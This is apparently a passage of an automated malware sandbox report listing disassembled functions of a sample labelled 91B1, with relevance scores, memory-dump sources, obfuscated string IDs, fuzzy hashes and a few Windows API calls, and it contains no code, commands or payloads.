                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E13242B0601B469FDB48CF26D580389BBB1FF45304F548698C9695FB5ADB35A8A2CFC0
                                                                                                                                                                                                                                            Function 00425E90 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 648COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                            • API String ID: 0-119712241
                                                                                                                                                                                                                                            • Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                            • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                            Function 004205B0 Relevance: 8.0, Strings: 6, Instructions: 481COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                            • API String ID: 0-2430453506
                                                                                                                                                                                                                                            • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                            • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                            Function 0042C64A Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-3264166258
                                                                                                                                                                                                                                            • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                            • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                                                                                                                                            Function 024BC8B1 Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-3264166258
                                                                                                                                                                                                                                            • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                            • Instruction ID: 71bcb16d34c2afef8497121d6b07e83acbbc8df18cf3bd58003839770b83cb46
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0B1D57510C3818EE369CF29C4D07ABBBD2AFD6314F188A6ED4D98B391DB748549C722
                                                                                                                                                                                                                                            Function 024989F7 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02498A1B
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02498A25
                                                                                                                                                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02498AC2
                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 02498AD7
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 02498BD9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4063528623-0
                                                                                                                                                                                                                                            • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                            • Instruction ID: 3c22db29e3041e4883b340d1e0098570924b4724292bdb834f920f83e432cf9b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6417C77F4431807D71CAEB9DC9936AB69B9BC4314F0E803F6985AB390DE795C0696C0
                                                                                                                                                                                                                                            Function 00422E93 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 394COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: )*$X9{;$r1B
                                                                                                                                                                                                                                            • API String ID: 0-1001561910
                                                                                                                                                                                                                                            • Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                            • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
                                                                                                                                                                                                                                            Function 0041BEA0 Relevance: 6.9, Strings: 5, Instructions: 684COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: -$C\$Iz$[^$de
                                                                                                                                                                                                                                            • API String ID: 0-3020956940
                                                                                                                                                                                                                                            • Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                            • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                                                                                                                                            Function 024B0817 Relevance: 6.7, Strings: 5, Instructions: 481COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                            • API String ID: 0-3335612808
                                                                                                                                                                                                                                            • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                            • Instruction ID: 069069d79d43cb6cf4bea0452027827898fb68567307262ae85d267941b464e6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AD117B56083018BD724DF25C8527ABB7F2EF92319F18996DE4828F3A4F7799401CB52
                                                                                                                                                                                                                                            Function 0042C6E4 Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-923305466
                                                                                                                                                                                                                                            • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                            • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                            Function 024BC94B Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-923305466
                                                                                                                                                                                                                                            • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                            • Instruction ID: f301dbb6ca1db81a006255d0263494cc57243c56ef61b29d79540b35bb951c58
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66A1D77510C3818EE365CF29C4D07ABBBD2AFD6304F188A6ED4D98B391DB748449C766
                                                                                                                                                                                                                                            Function 0042C735 Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-923305466
                                                                                                                                                                                                                                            • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                            • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                            Function 024BC99C Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-923305466
                                                                                                                                                                                                                                            • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                            • Instruction ID: 362284b3f6d56a0dbaff5ada9fcfbcea297e515e5218d39ffbb8955a1c9c2a62
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FA1D77410C3818EE365CF29C4D07ABBBD2AFD6304F288A6ED4D98B391DB748549C766
                                                                                                                                                                                                                                            Function 0042C726 Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-923305466
                                                                                                                                                                                                                                            • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                            • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                            Function 024BC98D Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                            • API String ID: 0-923305466
                                                                                                                                                                                                                                            • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                            • Instruction ID: e34893e954f569520b003ed65eb6b2666269d71f9a66198bcfee89c3a565cd48
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4CA1E67410C3818ED325CF29C4D07EBBBD6AFD2304F288A6ED4D98B291DB748449C762
                                                                                                                                                                                                                                            Function 00415298 Relevance: 6.1, Strings: 4, Instructions: 1123COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                            • API String ID: 0-979945983
                                                                                                                                                                                                                                            • Opcode ID: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                            • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55
                                                                                                                                                                                                                                            Function 0041DF80 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                            • API String ID: 0-3432275560
                                                                                                                                                                                                                                            • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                            • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                                                                                                                                            Function 024AE1E7 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                            • API String ID: 0-3432275560
                                                                                                                                                                                                                                            • Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                            • Instruction ID: 5d87d7fef0fa45d6488f4942b86123d8a35a87a65476da76f2ddf5fbed33f6bb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E742177060C3908FD725DF28C86076FBBE1AFA6214F08867EE8E55B392D7358506CB52
                                                                                                                                                                                                                                            Function 0042B4F7 Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                            • API String ID: 0-261129489
                                                                                                                                                                                                                                            • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                            • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                                                                                                                                            Function 024BB75E Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                            • API String ID: 0-261129489
                                                                                                                                                                                                                                            • Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                            • Instruction ID: 899687713e310fbb8661edb96a8ced5ba804bd98088320c005652a9a3bbfd9fe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0E1F87111D3C18AE765CF29C4517FBBBD6EF92208F18896EC4D987392DB39810AC722
                                                                                                                                                                                                                                            Function 0042B4FC Relevance: 5.5, Strings: 4, Instructions: 519COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                            • API String ID: 0-261129489
                                                                                                                                                                                                                                            • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                            • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
                                                                                                                                                                                                                                            Function 024BB763 Relevance: 5.5, Strings: 4, Instructions: 519COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
